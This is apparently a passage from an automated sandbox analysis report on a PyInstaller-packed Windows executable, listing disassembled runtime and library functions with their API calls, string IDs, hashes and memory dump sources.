                                                                                                                                                                                                      • API ID: DeallocFromLong$Dict_InternItemLong_StringUnicode_Unsigned
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 252187852-0
                                                                                                                                                                                                      • Opcode ID: cff6a4c6c921c4aa18eb5cea96de9df1f51ffc9f636274f994427a340c938c1a
                                                                                                                                                                                                      • Instruction ID: 84732fc2194cff1de14ea519d2bd8335d19dedbd95af22d9753f82fd826c1d59
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cff6a4c6c921c4aa18eb5cea96de9df1f51ffc9f636274f994427a340c938c1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E211EFA2D1C642C5EA294B3AED55238B294FF49B91F04A130DB0F56AB5DF6CD8818309
                                                                                                                                                                                                      Function 00007FFBBCD42604 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 2889003569-2084237596
                                                                                                                                                                                                      • Opcode ID: d60a8ffad84e6f064a5763a2c166d11077ba1814d2ca81799213d95430020a2c
                                                                                                                                                                                                      • Instruction ID: 32a04d07e8fc886709efd6009a1a07d89ad0c63303fa4733b205377288bd1102
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d60a8ffad84e6f064a5763a2c166d11077ba1814d2ca81799213d95430020a2c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4691AFF7B087828AE710DB78E4442AD7BA0FB44788F14412AEB8D17B55DF38D195CB04
                                                                                                                                                                                                      Function 00007FFBBCD4ADD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                      • API String ID: 2943138195-757766384
                                                                                                                                                                                                      • Opcode ID: 130e2d842e8b7dca47c2836e89f717505be4afbf408c40d13b3259f38f6b460e
                                                                                                                                                                                                      • Instruction ID: 2af6ef62481aaa30c42dccf6a0a752c540425fa3aecc534c12a8c9be662f946e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 130e2d842e8b7dca47c2836e89f717505be4afbf408c40d13b3259f38f6b460e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 657145FAB08A4298FB14CB79D8481BC77A4FB15784F884635DB6D02A98DF3CE561C708
                                                                                                                                                                                                      Function 00007FFBBCD42DB0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBBCD42DDA
                                                                                                                                                                                                        • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD42F2F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$__except_validate_context_record
                                                                                                                                                                                                      • String ID: $csm$csm
                                                                                                                                                                                                      • API String ID: 3000080923-1512788406
                                                                                                                                                                                                      • Opcode ID: 53f907965be1a88a6fd5fb15d1f71a23af454141565bf2445c328556a8274992
                                                                                                                                                                                                      • Instruction ID: 09a4c621daa88f0d8215c96974141ba64765c7cb065af55a85db550c4cda9673
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53f907965be1a88a6fd5fb15d1f71a23af454141565bf2445c328556a8274992
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40719EFAB0868186DB61CF3AD4487B97BA0EB04B96F548135EB4D57A89CF2CD491C708
                                                                                                                                                                                                      Function 00007FFBBCD42B88 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBBCD42BB0
                                                                                                                                                                                                        • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD42C7F
                                                                                                                                                                                                      • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFBBCD42C8F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Frameabort$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                      • API String ID: 1245442199-3733052814
                                                                                                                                                                                                      • Opcode ID: 20a4f0483044e05ead07b9216d24a097e489e06d9183abde2aaa2290edabb471
                                                                                                                                                                                                      • Instruction ID: ee87a2ba27888e8e2c9aa27c9da56bf77eb84c3d5c69345c1538a8cbd4db377f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20a4f0483044e05ead07b9216d24a097e489e06d9183abde2aaa2290edabb471
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B617CFAB082828AEB64CF39D44836877A0EB54B96F144135DB9D83B95CF7CE491C709
                                                                                                                                                                                                      Function 00007FFBBCD42394 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 2889003569-2084237596
                                                                                                                                                                                                      • Opcode ID: 9aa894c3c893ab74ee705d7221e0eb3435fed3f33ad5ca95d206f26215c5ec13
                                                                                                                                                                                                      • Instruction ID: 8d2561718064e4dbda3ac022c0e77f5a310d2435d17a65db3916f619199ce056
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9aa894c3c893ab74ee705d7221e0eb3435fed3f33ad5ca95d206f26215c5ec13
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5761A1B6B08BC581E720CF29E4443AAB7A0FB94B94F044225EB8C53B99DF7CD190CB04
                                                                                                                                                                                                      Function 00007FFBBCD442F0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 135COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileHeader
                                                                                                                                                                                                      • String ID: MOC$RCC$csm$csm
                                                                                                                                                                                                      • API String ID: 104395404-1441736206
                                                                                                                                                                                                      • Opcode ID: cc2941d08898c29ec0b938c5700553895786508ed6a70616e0c5efaebfc34f81
                                                                                                                                                                                                      • Instruction ID: 2e2d946daf96354ac0cc91f5ccb6e3bcacea041ad790b1b1f5471a70bf2fbb6d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc2941d08898c29ec0b938c5700553895786508ed6a70616e0c5efaebfc34f81
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 475178FAB0968287EA60DF39D15813A27A0FF44B94F044139EF8D57795DF3CE8A18609
                                                                                                                                                                                                      Function 00007FFBBB6339F8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: combined CRCs: stored = 0x%08x, computed = 0x%08x$ {0x%08x, 0x%08x}
                                                                                                                                                                                                      • API String ID: 0-2474432645
                                                                                                                                                                                                      • Opcode ID: e53ea50466aa9b22fc735f0e332c3c90fe13b21c106dd576f877e05a55725f8c
                                                                                                                                                                                                      • Instruction ID: 637bbb874a788c8a4ba45acb514a7178721c811ccb6474c24f5d323a2d2054e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e53ea50466aa9b22fc735f0e332c3c90fe13b21c106dd576f877e05a55725f8c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4415EB3E0854286EB648B3CD85167CA294FB45B58F189235DB0F8B2E5DE7CAC41C718
                                                                                                                                                                                                      Function 00007FF7FF582910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FF581B6A), ref: 00007FF7FF58295E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                      • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                      • Instruction ID: 42dd674dd24792ac39509d55fb4ee60895bc35c055690b4fa890fb0b15b52b89
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331F822B196C152EB20B761B8416E6A694BF887D4F800231EEBD83795EF7CD546C790
                                                                                                                                                                                                      Function 00007FFBBB6104F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PySequence_Size.PYTHON313(00000000,00000000,00007FFBAADC81F0,00007FFBBB6104A0), ref: 00007FFBBB610515
                                                                                                                                                                                                      • PySequence_GetItem.PYTHON313 ref: 00007FFBBB610548
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6105D4: PyMapping_Check.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB6105EC
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6105D4: PyMapping_GetOptionalItemString.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB61060B
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6105D4: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB610627
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6105D4: PyErr_Occurred.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB610643
                                                                                                                                                                                                      • PyErr_Format.PYTHON313 ref: 00007FFBBB615639
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_ItemLongMapping_Sequence_$CheckFormatLong_OccurredOptionalSizeStringUnsigned
                                                                                                                                                                                                      • String ID: Too many filters - liblzma supports a maximum of %d
                                                                                                                                                                                                      • API String ID: 2761522206-2617632755
                                                                                                                                                                                                      • Opcode ID: 1c904a72a4fd53edba76b9fdc25c7159333992813b3e46335f3bbba8fb89e293
                                                                                                                                                                                                      • Instruction ID: 570e24a109d9a710be7fbce90f74e6e55e21b9ee1955f37340c872ac68a04208
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c904a72a4fd53edba76b9fdc25c7159333992813b3e46335f3bbba8fb89e293
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A214FA1E0960249EA549A3AEE05175B650BB45BF4F14E731EF3F466F1DE3CE8418308
                                                                                                                                                                                                      Function 00007FF7FF582390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                      • Opcode ID: 1d12e5fd0a1cbb3074b4bf47f9af303a8c6acd8ffc361fc9321cf3165f3dca45
                                                                                                                                                                                                      • Instruction ID: e80e6ccd7687d2ee56b7cac09bab08abe4f8a49e2eae157f4c834f43a8af26d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d12e5fd0a1cbb3074b4bf47f9af303a8c6acd8ffc361fc9321cf3165f3dca45
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318672609AC289EB24EF61F8552F9A760FF89784F840235EA6D47B95DF3CD101C790
                                                                                                                                                                                                      Function 00007FFBBB611B1C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatOccurred
                                                                                                                                                                                                      • String ID: Invalid compression preset: %u$Invalid filter chain for FORMAT_ALONE - must be a single LZMA1 filter
                                                                                                                                                                                                      • API String ID: 4038069558-4068623215
                                                                                                                                                                                                      • Opcode ID: ba08bee32d3df14b21647ff01dcbdff88e72d6a4aa53834d0e24541db547eaa9
                                                                                                                                                                                                      • Instruction ID: c02e9fefbcf80eecd5a1c248a13193224cece82b4d6189eeaa9056849214a154
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba08bee32d3df14b21647ff01dcbdff88e72d6a4aa53834d0e24541db547eaa9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF212191A18A4641EA609B3DEC81379B250FF89BA4F50E231DB5F466F5EE2CDD058704
                                                                                                                                                                                                      Function 00007FF7FF582B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7FF58918F,?,00007FF7FF583C55), ref: 00007FF7FF582BA0
                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7FF582C2A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                      • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                      • Instruction ID: f4714e97318661e080f529a998005d688af2b1446776263923478a69a62d1afc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B021E562709B8192E710AB14F8447EAB7A4FB887C0F800232EEAD57795DF3CD215C790
                                                                                                                                                                                                      Function 00007FF7FF582710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7FF581B99), ref: 00007FF7FF582760
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                                                                                                                      • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                      • Instruction ID: 23891c94ccfbae8f1ee5ef28d63340dbc9028809e5bc62b8d3717c2ebc8fd39f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21A172A197C192EB20EB51B8817E6A7A4FB88384F800231EEAD53699DF7CD545C790
                                                                                                                                                                                                      Function 00007FFBBB633778 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
